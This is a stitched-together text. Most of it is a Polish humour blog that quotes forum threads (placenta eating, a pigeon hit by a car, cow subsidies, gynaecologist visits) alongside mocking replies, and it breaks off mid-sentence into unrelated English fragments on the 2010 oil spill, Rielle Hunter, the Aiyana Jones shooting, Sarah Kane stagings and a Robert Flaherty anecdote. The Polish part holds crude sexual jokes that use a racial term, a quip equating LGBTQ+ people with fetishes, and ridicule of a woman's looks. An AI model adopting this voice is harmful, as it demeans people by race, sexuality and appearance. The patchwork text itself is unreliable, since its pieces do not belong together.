Ja zjadłam na surowo , zaraz po porodzie , tak jak wszystkie inne ssaki .*** No właśnie miałam wizję jak na tym łożu porodowym tak szarpie zębami ...*** Gdyby skonsumowała cudze , popełniłaby cudzołożysko .
Jakby nie było , kul .
Z drugiej strony , najpierw powinna łożysko ochrzcić , pobłogosławić i poświęcić .
Po czym udusić na wolnym ogniu w wodzie święconej , z dodatkiem mirtu i wątróbki z bożej krówki .*** A pępowinę przegryzła ?*** Zrobiła spagetti*** Ja nie wiem , na jakie paliwo ci ludzie chodzą .
Pamiętam , kiedy miałam noworodki .
Zrobienie sobie kanapki i ogarnięcie otoczenia na poziomie minimum to był wyczyn .
Skąd się bierze energię na preparowanie łożyska na suplementy diety i DIY craftowe pamiątki ?*** Łożyska nie jadłaś , to i energii mało .
Na pocz ątku trzeba zjeść parę kęsów i dopiero brać się do pracy z resztą .
Tylko trzeba się powstrzymać , żeby nie zjeść wszystkiego , choćby kusiło , bo pamiątek nie będzie .
GOŁĘBIA MASAKRA SAMOCHODEM
*** Czujesz dobrze , ale co by dało gdyby kolega się zatrzymał ?
Pogrzeb gołębia mielibyście zrobić ?*** Uwaga , streszczam wątek : kierowca samochodu , którym jechała autorka , walnął przypadkiem w gołębia i pojechał dalej .*** Nie zawarlas sedna - autorka ma wyrzuty sumienia , że się nie zatrzymali i nie mieli szansy zresuscytować ptaka .*** Racja .
Brak informacji o wartości kąta , pod którym nadleciał ptak , zupełnie zbił mnie z pantałyku .*** brak też informacji czy była to gołębica , która lada moment złożyłaby jajka czy samiec lecący jakąś zapłodnić *** 30: 2 usta dziób , usta dziób **** ujowo streszczasz bo nie wiadomo co miala przewieźć autobusem autorka i ile to ważyło że jednak lepiej jej było jechać samochodem kolegi męża .
Ktory akurat jechał tamtą trasą .*** Karmę dla gołębi*** Nie no , ważyło 10 kg , ale nie ma ile ważył gołąb ...
Bo mając taką wiedzę można pewnie obliczy ć siłę uderzenia ... No i wiadomo , że to SUV , mąż nie ma SUVa więc lepiej było z kolegą .*** mi kiedys grzmotnal w zderzak tak , ze go podbilo i przelecial po dachu .
we wstecznym lusterku widzialam latajace piora , golebia gdzies w krzaki rzucilo .*** Mało !
Ten gołąb mógł mieć dzieci !
Powinien zrobić tak [ link
KROWA +
Link || kategoria : dom i zagroda || 15.04.2019 , 12:52 || Komentarze ( 0 )
*** No niestety , tylko dziecko .*** Hmm... jesli mam dwoje dzieci i dokupię dwie krowy to bedzie mi się nale żała emerytura " mama + " ?*** Poczekaj , ale jeśli jesteś nauczycielem , to już nie musisz robić sobie dzieciaka na 500+ , wystarczy , że sprawisz sobie krowę .
Mleko będzie , nawóz , to i ziemniaki wyrosną .
Na balkonie ewentualnie .
A z krową będziecie mogli oglądać wieczorem telewizję .
Może da więcej mleka przy Big Brother niż przy Mozarcie ?*** prawie się udławiłam pierogiem .
To mówię ja - mieszkanka wsi , która niestety nie posiada krowy , ale dla przykładu dużo komarów .
Za to też będzie dopłata ?*** Od sztuki komara czy od kilograma ?...*** To jest oferta dla nauczycieli .
Od dzis chlewik przy kazdej szkole *** Krowy się trzyma w oborze , jak jakieś czytają ematkę , to im będzie przykro .*** Ja mam owce , za owce też dają ?*** Ale w domu ?*** Nie , w szopie .*** Właśnie koleżance powiedziałam , że na strajk pójdziemy w koszulkach z napisem " chcę by ć krow ą " *** Widzisz tanebo 2 tu są same miastowe i pojęcia nie mają o krowach i świniach .
Twój hejt cienutki jak świński ogon .
Amen .*** wypraszam sobie , ja mieszkam na wsi .
W gminie wiejskiej .
I mam komary .
Oraz muchy .
Muszę im zapewnić guano do jedzenia oraz jakąś krew .
Na to się krety nadadzą .
Ament *** Krowę to mogłabym mieć , to przyjazne zwierzę i dałabym radę tylko lokalu brak .*** Kury mam .
Proponuję za kurę po 50 .*** A jak żona do męża mówi ty świnio a on do niej ty stara krowo to się liczy ?*** Powinni dostać
600 .*** To już nie wiem czy lepiej kolejne dziecko produkować czy krowę kupić .
Jak żyć panie premierze ?
ZDJĘCIE W WANNIE
POST NA FORUM :
FORUM WSPINA SIĘ NA WYŻYNY EMPATII :
*** Tylko niech wanny nie usuwa bo się woda ze zdjęcia wyleje
*** A czy jakby usunął ścianę , to podejrzałby somsiadów ?
*** Jeśli robione iPhonem , to live photo da się cofnąć do momentu jak wchodziła do wanny
*** Jak kiedyś próbowałem usunąć ZUS przez Photoshopa ale jakiegoś pluginu mi brakowało
*** Jak chcesz żeby było mniej piany to weź mydło .
Mydło zjada pianę .
# potwierdzoneinfo już w przedszkolu
*** Może jeszcze zoom zdjęcia jak w Blade Runner ?
*** To zależy na ile osób jest ta wanna ...
*** Jak piana jest w jednym odcieniu koloru to łatwo się jej pozbędzie
*** Coś pokroju ciąży w kolanie ?
***z zajściem przez korzystanie z tej samej deski klozetowej .
*** niech poczeka , jak woda wystygnie to piana zniknie
[ podesłała Emilia - dzięki ;- ) ) ) ) ]
DMUCHANIE NOSA W UŻYWANE MAJTKI
*** Moje dzieci nigdy nie były aż tak giętkie żeby nosem do majtek sięgnąć ...*** Ja myśle , że to zdjecie w parach , wymiennie : Jaś w majtki Małgosi , Małgosia w majtki Jasia .*** A nie zostanie od tego fetyszystą ?
Wiesz , dzisiaj wąchanie brudnych majtek , jutro LGBTQ + , BSM i inne literki .*** W sensie , że aktualnie używane ?
Trochę cieżko i daleko .*** ja tylko znam wycieranie majtkami twarzy , żeby nikt uroku nie rzucił na dziecko , czy jakoś tak ...*** Mój trzylatek ostatnio tak zrobił bez mojego nakazu .
Siedział na nocniku , nie miał pod ręką chusteczki , zanim zdążyłam zareagować , wytarł nochal w świeżo zdjęte z tyłka majty .*** Nie , dla mnie to obrzydliweAle mój facet ma kolegę , który tak robi .
Uwaga , była po rozstaniu przy walce o prawa do dziecka powiedziała o tym w sądzie jako znak , że on ma jakieś pedofilskie zapędy ( pewnie smarkał w gacie córki )
Sąd nie uznał co prawda tego argumentu , ale teraz wszyscy wiedzą o tym jego zwyczaju .
Wydał mi się przedziwny ...*** Ale jak chce się wysmarkać to wyciąga z kosza używane gacie i wtedy to robi ?
Czy ściąga je z siebie ?
Czy z córki ?
Czy jak się nawiną a nie chce mu sie dudy ruszy ć po chusteczkę ?*** Ale że moje ?
Dzieci potrafią robić cuda , ale do swoich majtek raczej nie dostaną .
Ok , idę stąd .
WYKRZYWIONA TOŻSAMOŚĆ PŁCIOWA
*** Myślę , ze dzieciom do ukończenia 18 roku życia w ogóle nie nalezy robić zdjęć .
Można się włamać nawet na prywatne komputery , albo do telefony , a przecież każde zdjęcie dziecka to tylko zaproszenie dla pedofila .
Więc ew. jesli chce sie mieć taką niebezpieczną pamiątkę , to trzeba kupić stary aparat , nie cyfrowy , oczywiście nie dawać kliszy do wywołania , tylko zrobić sobie domową ciemnię , zdjęcia włoży ć do albumu , album do sejfu .*** A jak się włamią do domu i ukradną album , to co ?
To bardzo niebezpieczne .*** Toż piszę , ze album do sejfu .
Bez tego ani rusz !*** Bankomaty wysadzają , taki sejf to będzie pikus .
Stanowczo , lepiej nie robic zdjec .
Najlepiej tez nie wychodzic z dzieckiem na ulice .
Tam tez czyhają zeby fotografowac znienacka .
Naprawdę , jak bum cyk cyk .*** Najgorsze : trzeba również ostrzec dzieci w przeszkolu , ze nie wolno im narysować podobizny przyjaciela .
Nawet jeśli to oznacza kółko i dwie kreski .
Nie wolno i już .
Nie chodzi mi o nierobienie zdjęć , tylko o to co się z nimi później dzieje ...
Można się śmiać , ale nie wzięłam sobie tego tematu z księżyca , tylko przeczytałam w gazecie .
Dla mnie to jest ważny temat , to chyba nic dziwnego , że nie chce aby zdjęcia mojego dziecka wpadły w ręce komuś , kto nie wiadomo jak może je wykorzystać *** Jak pisało w gazecie , to rzeczywiście trzeba się pilnować .
Więc bardzo uwazaj - ja ostatnio czytałam , ze w przedszkolu opiekunka znęcała się nad dzieckiem , ze niania była nieuczciwa , a nawet że porwali dziecko wraz z matką .
Powinnaś bardzo uwazać i nie wychodzić z dzieckiem z domu , a już na pewno nie oddawać go do przedszkola .
Najgorzej jednak jest na plaży - tam dziecko nieubrane , a ludzie mają komórki .
Więć gdybyś była z dzieckiem na wakacjach pamiętaj , ze musi mieć zawsze zakrytą twarz .*** Papierowa torba z otworami na oczy ?*** To bardzo poważne zagrożenie , dobrze że się tak przejmujesz .
A jak zabezpieczasz Dziecko np na placu zabaw , żeby wiadomo kto nie zrobil Mu zdjęcia i nie wykorzystal Go wiadomo do czego ?
Ja zakładam kaptur i daszek od czapki tak , żeby zaslonil Dziecku całą twarz , ale Ono się wtedy często potyka i boję się , że wtedy wiadomo kto może sfotografować Jego Tyłek , bo jest wówczas wypięty i na widoku .
Nie wiem co robić ...
Oj , nie wiem po co ta ironia .
Przedstawiasz skrajność , a ja mówię o czymś co się dzieje na prawdę .
Zadam Ci pytanie wprost , bo widzę że bardzo bagatelizujesz cały ten temat i też trochę " podkoloruje " sytuacje tak jak to robisz - z winy fotografa
Twoje zdjęcia z sesji , w samej bieliźnie , bo akurat taką miałaś ochotę trafiają do sieci .
Nie wiadomo nawet gdzie .
Na plaży też chodzisz w stroju kąpielowym , ale chyba Twoja reakcja w tym wypadku będzie inna ?
To oczywiście tylko przykład , którym chce pokazać Ci o co mi chodzi ...
Bo widzę , że nie rozumiesz , albo celowo przeinaczasz .*** Jeśli ktoś zobaczy moje zdjęcia w bieliźnie - sam będzie sobie winien ...
Niech sobie potem " odzobacza " .
A praktycznie zdjęcia moich dzieci SĄ w sieci , bo kole żanka wygrała jakąś nagrodę w konkursie fotograficznym , a moja córka była modelką .
Natomiast sama wiesz kogo NIE interesują zdjęcia z sesji fotograficznych przy choince albo berbecia w koszu .
Szczerze to nie spodziewałam się , że aż tak odmienne będzie Wasze zdanie w tej kwestii ...
Czyli jeśli zdjęcia
Wasze lub dzieci wyciekłyby do sieci i zostały w jakiś sposób wykorzystane przez kogoś , a to wszystko z winy fotografa , to machnęłybyście ręką ?
Czy raczej wściekłybyście się ?
No właśnie , założę się że to drugie .
A lepiej zapobiegać , niż leczyć .
Dlatego właśnie myślę , że fotografowie niedbający o bezpiecze ństwo zdjęć to nie jest błaha sprawa .*** Ależ my sie z Tobą zgadzamy .
Powinnaś strzec dziecka .
Każde wyjście z domu jest skrajnie niebezpieczne , nie wiadomo kto może zrobić zdjecie .
Uwazam , że matki , które pozwalają , aby dziecko wychodziły z odkrytą twarzą na ulicę są skrajnie nieodpowiedzialne .
Mam nadzieję , ze Ty tego nie robisz .*** Odpuścić , to niebezpieczne , a od tych dziwnych pozycji dzieciom się główki łamią i tożsamość płciowa wykrzywia .*** Dokładnie .
Slyszalam o dziecku , ktore na sesji wlożono do koszyka i do teraz mysli , ze jest kotem .
A minęlo juz 1772 dni*** A znasz fotografa , który zabezpieczy fotki Mojego maluszka ?
Roczek skończył dawno( niedługo 17 lat mu stuknie ) , ale sesyjka mile widziana ... Na marginesie - jakoś tak wyczuwam reklamę ( to " maluszkowanie " , roczek , zaimki dużą liter ą- taki tekścik na zamówionko ) .*** Ale ze chcesz robić 17 - latkowi zdjęcia maluszka ???
Ok , to dopiero jest niepokojące ...*** nie wiem , ale jak slysze okreslenie " maluszek " , to sie wywalam na lewa strone *** Bo jesteś lewaczką !
Ja jestem prawdziwa Polka - katoliczka więc na hasło " maluszek " przewracam się na prawą stronę *** a mi się maluszek kojarzy jedynie z koniecznością zaciągnięcia ssania zanim się uruchomi .
Nigdy tego nie potrafiłam zsynchronizować .
ZEZOWATE DEZYZORANTY
*** Dezydoranty .*** Dezodorant .
Z tarczą .*** i przyłbicą *** Dezydoranty to zapewne zalecenia z " Dezyderaty " .
Ale to miało działać dłużej niż 48h ...?*** Btw ciekawe jak długo można kroczy ć spokojnie wśród zgiełku i pośpiechu , nie myjac się i woniejac w poliestrowych ubraniach *** Tyle ile współtowarzysze wytrzymaj ą*** Ale bez wyrzekania się siebie ?*** Żeby martwym mężem nie wonialo w polonezie ?*** Czy dezyzoranty to zyzowate , pardon , zezowate dezodoranty ???
Zezują przez 48 godzin ?
SKARPETKI , JEDNORAZOWY BIDET I PENIUAR , CZYLI EMATKA U GINEKOLOGA
*** Nie . Badanie to nie seks .
Aczkolwiek do seksu też nie ściągam .*** Nie , nigdy .
A zwykle noszę ciekawe skarpetki np . w jednorożce *** Oczywiście , że zdejmuje .
Jestem naga całkowicie pod jednarowym peniuaren .*** Do pobrania wymazu z pochwy i badania palpacyjnego rozbierasz się do naga i narzucasz peniuar ?*** Mam badanie piersi .
Ginekolog też to robi .
Tak jestem naga .*** Stopy też ci bada ?*** Rasowa ematka ma peniuar ma podorędziu w każdej sytuacji .
Takoż pas do pończoch i jednorazowy bidet .*** Nie zdejmuję , bo mi zimno w stopy .
Latem najczęściej zakładam bawełniane stopki , które przynoszę sobie w torebce , bo jak siedzę na fotelu i opieram stopy o te metalowe podpórki , to mi marzną ( stopy , nie podpórki ) *** Ja nie ściągam .
I tak nogi id ą na bok , czy jak to tam było*** Po co ?
Ginekolog bada pochwę , macicę i przydatki a nie grzybicę stóp czy pedicure *** Zawsze zakładam specjalnie czyste skarpetki , żeby na bosaka nie przechodzić i żeby gołymi syrami przy jego twarzy nie macha ć
ŻYCIE NA BENEFICIE
*** Trzeba iś ć do pracyna mieszkanie socjalne można liczy ć?*** Tak .
Na namiot nad wodąna namiot to mnie stać , pytam o mieszkanie pod wynajem na koszt państwa *** Jak cos sie wynajmuje to chyba logicznie rzecz biorąc , nie robi się tego na czyjś koszt ? więc może bez wynajmowania ... po prostu na koszt państwa*** Nierobynie każdy ma krew niewolnika ... skoro wszyscy pracują to czy ja też muszę ?*** Praca uszlachetnia i ksztalciprzepracowałem już w swoim życiu łącznie 5 lat i nie czuje się bardziej szlachetny *** Jest cała masa mieszkań socjalnych tylko trzeba na pontonie przypłynąć .*** Ty tak poważnie ?
dlaczego nie ?*** Weź za sobą skrzynkę jabłek - będziesz gnił razem z nimi !!!***w
Polsce jest zajebiscie , wracaj , machnij pare bachorow i z pincet plus zyj *** Mam nadzieje ze to nie jest zarazliwe *** Odnosnie pracy na Malcie mozesz poczytac tu LINK pytałem o benefity a nie o pracę *** Nie ma socjalu ( serio , tu trzeba pracować ) , ale może grupa się zrzuci ?
Posiedzisz na plaży , a my niewolnicy , będziemy na to pracować ...
A tak serio , raz jeszcze - nie ma socjalujakieś zasiłki dla bezrobotnych ?
Może coś w stylu 500 + na dzieci ?*** Co ta są benefity ?
Tu się pracuje , nie lezy na plecachniewolnicza krew *** Kolega ma na mysli pewnie " friends with benefits "
PŁÓD W MAKIJAŻU
*** No płód ma raczej nie do końca rozwinięt ą skórę , więc faktycznie jak mu nałożysz makijaż to może zaszkodzić .*** Strasznie trudno się płodowi sztuczne rzęsy doczepia , więc nie polecam .
A klej może podrażnic oczko .*** I włosów nie można ( mu ) farbować , bo to też szkodzi .*** A najgorzej jak jescze nie ma włosów *** nie ma rady , trzeba przeszczep zrobic *** albo jak jest na etapie owłosienia całego ciała .
jak to malować ?
czym golić ?*** Ale macie problemy .
Z lekka podfryzowac i spryskac kolorowym lakierem , po co golic czy malowac ?*** Lakierem trudno , po psikaniu zostają resztki i potem się ginekolog na wizycie śmieje ...*** znacznie bardziej szkodza pryskane skorki owocow i warzyw jak " plod to zje " . (
Jakies zaawansowane te wspolczesne plody , maluja sie , jablko ze skorka chrupia hoho .... )*** Po przeczytaniu wątku widzę oczami wyobraźni moją koleżankę ( akurat jest w ciąży , do pracy zawsze full make - up ) jak siedzi i klei płodowi sztuczne rzęsy *** Ja jeszcze płodowi bym zafundowała natryskowe opalanie
PATOLOGIA SYPIALNIANA
*** U nas to taka patologia , że śpię tylko z mężem , ale i z psem *** Ja z mężem i trzema kotami .
Myszy też się zdarzały .
To dopiero patologia*** U mnie sa noce ze spimy my , 2 dzieci i 2 koty .... jakby rybki mogly wyjsc z akwarium to tez by z nami spały ...*** U nas jest tak , że jak w nocy kot wstaje jeść , to ja sie wreszcie moge swobodnie przeciagnać , kołdre na nowo ułoży ć i wtedy czuje jaki to luksus spać tylko we dwoje .
Prawie jak w tym dowcipie o żydzie , rabinie i kozie , tylko że u nas kot po jedzeniu wraca *** No ja śpę z konkubinem z biedy oczywiście , bo mieszkamy w jednoizbowej chacie i stac nas na jedno łóżko .
Malo tego , jesteśmy tak biedni , że nawet koty śpią z nami .*** U nas wrecz przeciwnie , nie tylko czesto w osobnych lozkach , ale wrecz w osobnych miszkaniach .
Kto bogatemu zabroni , ha !*** To jak my .
Ba , jestesmy tak bogaci , ze nawet osobne rodziny mamy ...*** Rozusta , Pani , i fanaberie na calego .*** Konkubinat też z biedy , bo na ślub nie stać*** Mieszkamy w kurniku , więc nie tylko wspólne łóżko , ale jeszcze sypiają w nim zwierzęta ( pies ) .*** Łojj pani , pewnie , że z przymusu .
Jeszcze i żywina z nami w jednej izbie staje .*** Napisalabym , zgodnie z prawda , ze z checi i wielka przyjemnoscia spimy razem ale dla dobra sfrustrowanych forumowych dziun napisze , ze spimy razem ale ' stary ' smierdzi , pierdzi , zabiera koldre i nie pozwala otworzyc okna i , ze juz mecze sie tak dluuuugo !
WŚCIEKŁY KOT UCHODŹCA
*** Powiedz , że żartujesz ?
Jak przegonisz gołębia i machniesz na niego ręką lecisz się szczepić na ptasią grypę ?
Kota doknelam przez siatke w namiocie , dlatego nie zartuje .
Normalnie bym sie nie zastanawiala .
Nic no , jutro pojde do lekarza rodzinnego , powodbnoe pierwsza dawke szczepionki trzeba podac w ciagu 10 dni.*** uważaj , bo mógł zaszczepić ci pod skórą surowego ziemniaka .
zostały ci trzy minuty życia , wykorzystaj je mądrze .*** Radzę ci poszukać sobie dobrego psychiatry .*** będziesz ży ć.*** Odpuść , równie dobrze dzika wiewiórka mogła
Ci się skichać na tropik , a przecież go potem zwijałaś ...*** Albo się bzykać z panem Wiewiórkiem i zostawić płyny ustrojowe ...*** Boskie , siedze i placze ze smiechu , nawet nie mam sily skomentowacNo dobrze , wyjasnij jak krowie na rowie co jest w tym smiesznego ?*** Jak krowie na rowie : nie miałaś kontaktu z płynami ustrojowymi ( zakładam , że nie pacnęłaś kota w odbyt czy głebię gardzieli ) , nie miałaś uszkodzeń skóry , kota nie lizałaś ani nie dotykałaś gałką oczną , sama twierdzisz , że od 2010 r nie odnotowano na tym terenie przypadków wścieklizny .*** Gałką oczną w odbyt kotu*** Pchał się do namiotu- to był kot uchodźca !*** Partnera tez zaszczep , przeciez dotykal Cie .. chyba .*** Wy tu śmichy chichy , a autorka zamilkła , może już pianę z ust toczy *** No .
Bo na pewno nie poszla sie napić .
Światła sobie też nie zapaliła *** Bo to zdradziecki atak antyszczepionkowców jest *** I myślisz , że wysłali kota sabotażystę ?
A może to był lis ?
A autorce tylko się wydawało , że to był kot , w sumie ciemno było i może go tą ręką pacnęła akurat w odbyt , a on ze strachu popuścił .*** Akurat tam w odbyt pacnęła .
Lisa w penisa !
MURZYNEK
, albo
wsadź go w toster
3. Siedźcie dłużeju w knajpie .
Jak mężulek lepiej popije bedziesz miała z głowy
problem loda , jak również jakiegokolwiek współżycia ;-) )
4 . Może masz opory natury estetycznej ??
Wtedy musisz kupić farbki i
pomalować " orzełka " w jakieś kwiatuszki , lub inne motywy ;-) )
Mam nadzieję , że choć troszkę pomogłem ;-) ) )
PS Wyrzuć z lodówki te murzynki !!!!!!!!!
One są już przeterminowane !!!!!!!
Polecam całość tutaj : [ LINK ]
SOFA , ALE JEDNAK NIE Link || kategoria : dom i zagroda || 03.01.2019 , 12:44 || Komentarze ( 3 )
Szczęśliwego Nowego 2019 :)
POST NA FORUM :
jak nazywa się taki mebel
Jak wyszukać w necie taki mebel : tapicerowane siedziska , jakby bezp .
na podłodze , bez nóżek , czasami bez oparcia , a czasem wyprofilowane .
Takie zastępstwo dla sofy , niska sofa bez oparcia .
Jak się takie cholerstwo nazywa ?
Pomóżcie !!
Zdjęcie mi wcięło niestety , a było jedno jedyne .
FORUM MOCNO SIĘ ZASTANAWIA :
*** legowisko dla psa
*** Zawalidroga ?
*** pufa , lawa
*** Lawa ?!
*** tak , wulkaniczna .
o czym innym moglam pomyslec w watku meblowym .
[ LINK ]
ZAUSZCZONA KICHANKA
Link || kategoria : relacje międzyludzkie || 10.12.2018 , 12:33 || Komentarze ( 0 )
POST NA FORUM :
Romans z paskuda
Maz mojej znajomej ma romans .
I to z kim !
Ona , znajoma - sliczna , subtelna , zgrabna dziewczyna .
Zadbana .
On - niczego sobie facet
Kichanka - takie nic w sumie , zauszczona , zaniedbana mysz .
Brak makijazu , nadwaga , tragiczne ubrania .
Starsza rok od niego !
Czy ktos jest w stanie mi.wytlumaczyc o co chodzi ?
Co taki facet ma w glowie ?
Nikt nie jest tego w.stanie pojac , co kieruje mezczyznami wchodzacymi w romans z kobietami z duuuzo nizszej ligii niz ich partnerka ?
FORUM WSPINA SIĘ NA WYŻYNY EMPATII :
***" Zauszczona kichanka " .
Cudnie .
*** No co ? tzn Przeziębiona kochanka z brudnymi uszami
*** Pewnie te ubrania były tak tragiczne , że postanowił ją rozebrać , to logiczne .
*** Stad wniosek , ze pan sie poswieca dla ludzkosci i powinien za to medal dostac .
*** Co taki facet ma w głowie ?
Kichankę
*** Na fali wątków o zdradach czekam jeszcze na wątek o facecie zdradzającym żonę z facetem , zdradzajacym z zapuszczonym facetem , a na koniec o facecie zdradzajacym żonę z transwestytą ( czego mu może brakować w małżeństwie ??? ) .
*** Nie wierze !
O caly rok starsza !!!
Co za koszmar !
[ LINK ]
*** buhhaahhahahhaaFajnie zaczac tydzien w tak zabawy sposob , rozesle twojpost znajomym na gg , tez niech sie posmieja , maszdziewucho , chlopaku talent literacki : ) ) ) )
Nie napisalas , czy umiescil tego murzynka na umytymczlonku , czy na takim , po sprostaniu potzrebomfizjologicznym , bo jak wiadomo knajpa + piffko rzadza sieswymi prawami ...*** a jak sie robi rakiete ?*** moj maz tez pewnie by chcial , zeby mu zrobic rakiete , ale jak to sie robi ???????*** Jak się robi rakietę ???
może trzeba wsadzić petardę do tyłka i podpalić ??*** Ugryź go w tego murzynka raz a dobrze .*** Ale wy jestescie niedouczeni - loda bierze sie do buzi a rakieta to reka !
Co zaludzie , gdziescie sie chowali ?*** Buhahahaha !
Ale sie usmialam !
Dobre , dobre !
Jesli to nie zart , to powiedz , kto wg Ciebie , jesli nie Ty , mialby mu tego lodarobic ?*** Hm ... Chcialabym doradzic cos madrego ale nic mi nie przychodzi do glowy oprocz tego , ze moze zamiast murzynka zastosowac kajzerke z maslem .
To jakos tak zdrowiej - bez cukru , ktory moglby zle na Twoje uzebienie wplynac i w ogole ...
Pzdrw *** Rewelacja :) To rzuca calkiem nowe swiatlo na moje przyszle zycie seksualne .*** Wlasnie przeczytalam ten list , staralam sie czylac dokladnie , ale jest juzpozno , wiec byc moze cos tam mi umknelo , ale mimo to bardzo chcialabym pomoc .
Tylko , ze niewiele doswiadczen mam z murzynkami , bo piec nie za bardzo umniem ( moze gdyby problem dotyczyl kanapek , to jakos moglabym pomoc ) , ale i takchcialabym pomoc .
Wiec tak sobie pomyslalam , ze moge popytac znajomych .
Naszczescie mam troche znajomych , wiec moze oni by cos mogli pomoc .
Tylko , zeteraz juz troszke pozno , wiec moze zadzwonie jutro , bo jak zadzwonie teraz , tooni moga sie troche zloscic , ze ich budze ?
Chociaz to w powaznej sprawieprzeciez .
Ale moze jednak podzwonie jutro , tylko moze nie tak z rana , bo mozetez niektorym sie to nie podobac , ze tak dzwonie z rana w sobote .
A jak siewkurza , to przeciez moga nie pomoc , nawet gdyby wiedzieli jak .
To moze jedanknie ryzykowac i poczekac do poludnia ?
Na razie badz dzielna , i daj daj sie , zwlaszcza uwazaj na ta salmonelle , bo jagdzies slyszalam , ale nie wiem czy to jest prawda , czy tylko taka plotka , zesalmonella nie jest najzdrowsza .*** Kochanie - myślę , że już najwyższy czas pozby ć się tego murzynka z lodówki .
Tydzień mu wystarczy .
Jak widać nie bardzo
Wam smakował na talerzu , a i zczłonka go nie można było zjeść , więc może zmień menu deserowe i już więcej gonie kupuj .
Z pewnością rozwiąże to Twój problem .
Pomyśl o eklerkach - te sąsmaczniejsze .*** Nie rozumiem twoich oporów kulinarnych .
Pewnie potrafisz przygotowac tylkopotrawy na ciepło lub kanapki .
A zrobienie loda to wcale nie takie trudne , jeśli masz troche dobrej woli , książkę kucharską i zamrażalnik .
Trzeba tylko ukręcić ... a zresztą co bedę się rozpisywać , przepis znajdzieszw " Kuchni Polskiej " .
Co do murzynka , może kontrast kolorystyczny jest zbyt duży , jeśli partner jestrasy kaukazkiej i to rani twoje poczucie estetyki .
Kupuj ptysie .*** Ja mam kilka pomysłów na rozwiązanie twojego problemu: 1 .
Skoro masz opory z " lodem " a z " rakiet ą " sobie radzisz , to przyjżyj sięmałym dzieciom .
U nich jest zasada - " Co do rączki to do buzi " ;-) ) ) 2 .
Może poprostu nie lubisz surowego mięsa ??
Tutaj proponuję dwa rozwiazania - albo ugotuj go rano razem z parówkami
Posted by Gail the Actuary on May 18 , 2010 - 12:36 pm
I listened to a press conference with NOAA administrators this morning regarding the possibility of oil from the oil spill getting into the Loop Current .
Some of the takeaways from the press conference :
1 . While tar balls have been found in the Florida Keys , test have not yet been performed to determine whether they are from BP 's oil spill .
They might be from another source .
2 . Any oil that does get into the Loop Current will be very dilute and weathered , by the time it gets to Florida .
If oil does go this far , tar balls would be typical of the kind of hydrocarbons one would expect , by the time the oil gets this far .
3 . The vast majority of the oil in the oil slick is " dozens of miles " from the Loop Current .
What is relatively close is the very tip of a tendril of light oil slick extending to the south .
According to a map on the NOAA website ( shown below the fold ) , " Ocean models indicate that the band of oil sheens along the souther edge of the plume which is in a counterclockwise eddy could enter the northeastern edge of the Loop Current . "
Queen of Talk Oprah Winfrey will set the stage for Rielle Hunter - John Edwards ' former mistress - to give her first televised interview , CNN has confirmed .
While there have been reports that the interview will air sometime in May , a spokeswoman for the Oprah Winfrey show said that a specific date for the upcoming show has not been set yet .
Last May , Edwards ' wife Elizabeth talked to Winfrey about her husband 's infidelity and her battle with cancer .
When Winfrey asked Elizabeth whether or not she still loved her husband , she responded , " It 's complicated . "
The couple have since separated .
( CNN ) -- A Michigan attorney on Tuesday refuted a medical examiner 's findings about a 7 - year - old girl 's shooting death , charging a police cover - up in the incident .
Attorney Geoffrey Fieger told reporters that he retained Macomb County Medical Examiner Daniel Spitz to conduct his own investigation .
Fieger said Spitz 's findings were contradictory to the official Wayne County medical examiner 's report that the bullet struck the child in the neck .
Spitz 's report showed that the bullet hit the top of Aiyana Jones ' head .
It exited through her neck and grazed her chest , Fieger said .
He said the report disproves a claim by police that there had been a tussle between officers and the girl 's grandmother , Mertilla Jones , inside their house .
The grandmother and granddaughter were sleeping on a couch in the front room when the raid occurred .
" Certainly there was no time for a struggle , " Fieger said .
Jones died in the May 16 police raid .
Detroit Assistant Police Chief Ralph Godbee has said that preliminary information indicated that officers approached the house with a search warrant for the girl 's uncle in connection with the shooting of a high school student last month .
Godbee said the officer 's gun discharged accidentally inside the home after physical contact with Mertilla Jones .
Fieger showed reporters a computer - generated diagram of the shooting , based on Spitz 's medical report and a video that Fieger said he has seen .
Fieger said it was clear that the gunshot came from outside the home , from the front porch , after police tossed in what 's known as a " flash - bang " grenade to startle the residents .
" He shot purposely , " Fieger said of the officer .
" What he was aiming at , I can't tell you .
But I can tell you it was not an accident . "
Fieger has sued the city on behalf of Jones ' family , saying that police need to be held accountable .
He held up a pair of child 's hightops Tuesday -- black with pink shoelaces .
They were Aiyana Jones ' " princess gym shoes . "
" My belief is that this is part of a significant cover - up , " Fieger said .
" Come forward and tell the truth . "
A state police investigation is ongoing .
sarah kane , theatre , video
Before moving on to Kane ’s later work – and to demo just how firmly it ’s taken root ( especially in mainland Europe ) – today I ’m presenting a selection of performance clips .
As her career progressed , she increasingly gave up stage directions , which has become a licence for radically different productions of her scripts – a kind of artistic roulette documented here in five videos ( there are pages more on YouTube ) .
Some nudity , violence , general emotional carnage – click through for credits …
Cleansed in an institutional loft space – bullets scattered on the floor and a fluorescent table holding props and visible sound effects ( such as the amplified snip of shears which impacts on the characters remotely ) .
Meanwhile , 4:48 Psychosis – which famously comes with no stage directions – is often reinvented as physical theatre / dance .
This production shows how its angst can become unnecessarily amplified in the process , but there are inventive elements – and it ’s surely the share - all challenge of Kane ’s writing which has seen her become so popular – especially with younger audiences .
Stark lighting and casual clothes give this 4:48 ( recently staged at the Barbican ) a hard - edged clarity often lost in an anti-dramatic morass haphazardly punctuated by melodramatic gestures ( more from same production ) .
A script with no guide demands a lot of director and actor(s ) – when they fail , it ’s most often due to indulging themselves ( directors with over - literal and / or reverent staging , actors treating the play ’s supremely exposed internal landscape as one showboat breakdown scene ) .
Another very physical take – the strength here being ( aside from being admirably well - drilled ) that the actresses are n’t afraid to have fun – when 4:48 Psychosis is performed as a one - note piece on depression , it tries the patience ( ha – ‘ tries the patients ’ would be a pretty good plot summary ) .
In itself , this flatness , this difficulty to endure may even be a point worth making , – but it ’s almost certainly unintended by most who expect the supposed verite / endless emoting of unleavened pain to hold an audience ’s attention indefinitely …
Some of the more interesting productions step away from the script as monologue / chamber piece and flesh out as full ensemble – there ’s something perverse about Kane ’s painfully personal confessional emerging from such a plethora of mouths , but there ’s maybe also a nice feel for the splintering of self – or even a comfort in solidarity .
Our friend at Punk Ass Bitch posted this a couple of days ago and it has a slow starts , it evolves into a clusterphuck of animated shapes and forms creating the trippiest non-drug related experience .
As having done minor animation in the past , this frame by frame based film done by German studio Film Builder is just awesome .
As a fan of weird ass videos , please comment below if you have other trippy video suggestions !
In 1948 , Robert Flaherty was working on " The Louisiana Story . "
He was searching for a small boat , or " pirogue " for his young hero .
Flaherty soon became aware that pirogue - making was a disappearing art .
